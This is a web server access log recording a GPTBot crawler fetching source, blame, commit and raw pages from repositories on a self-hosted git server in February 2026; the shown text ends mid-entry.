"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" -[17/Feb/2026:13:37:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 74.7.227.38] [Length 10978] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" -[17/Feb/2026:13:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12785] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:13:37:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" -[17/Feb/2026:13:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" -[17/Feb/2026:13:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" -[17/Feb/2026:13:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10756] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" -[17/Feb/2026:13:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/.gitignore" -[17/Feb/2026:13:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" -[17/Feb/2026:13:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" -[17/Feb/2026:13:37:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" [Client 74.7.227.38] [Length 11652] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:37:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" [Client 74.7.227.38] [Length 38341] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12481] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" -[17/Feb/2026:13:37:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" -[17/Feb/2026:13:37:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" -[17/Feb/2026:13:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 15336] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:37:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13173] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" -[17/Feb/2026:13:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11901] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup" -[17/Feb/2026:13:37:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/semiyearly" [Client 74.7.227.38] [Length 8583] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:13:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10927] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx" -[17/Feb/2026:13:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" -[17/Feb/2026:13:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" [Client 74.7.227.38] [Length 19730] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" -[17/Feb/2026:13:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11401] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" -[17/Feb/2026:13:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls" [Client 74.7.227.38] [Length 9929] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html?display=rendered" [Client 74.7.227.38] [Length 14305] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" -[17/Feb/2026:13:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12971] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" -[17/Feb/2026:13:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" -[17/Feb/2026:13:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11156] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" -[17/Feb/2026:13:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 1752045] [Gzip 24.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" -[17/Feb/2026:13:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" -[17/Feb/2026:13:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" -[17/Feb/2026:13:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" -[17/Feb/2026:13:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/main.py" -[17/Feb/2026:13:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" -[17/Feb/2026:13:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9933] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/import%20sys.py" -[17/Feb/2026:13:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" -[17/Feb/2026:13:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 74.7.227.38] [Length 12529] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" -[17/Feb/2026:13:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 74.7.227.38] [Length 12528] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" -[17/Feb/2026:13:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 74.7.227.38] [Length 12529] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" -[17/Feb/2026:13:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 74.7.227.38] [Length 17121] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" -[17/Feb/2026:13:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10280] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10120] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" [Client 74.7.227.38] [Length 11410] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" -[17/Feb/2026:13:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 17209] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:13:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 234373] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" -[17/Feb/2026:13:37:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" -[17/Feb/2026:13:37:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" -[17/Feb/2026:13:37:41 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" -[17/Feb/2026:13:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr 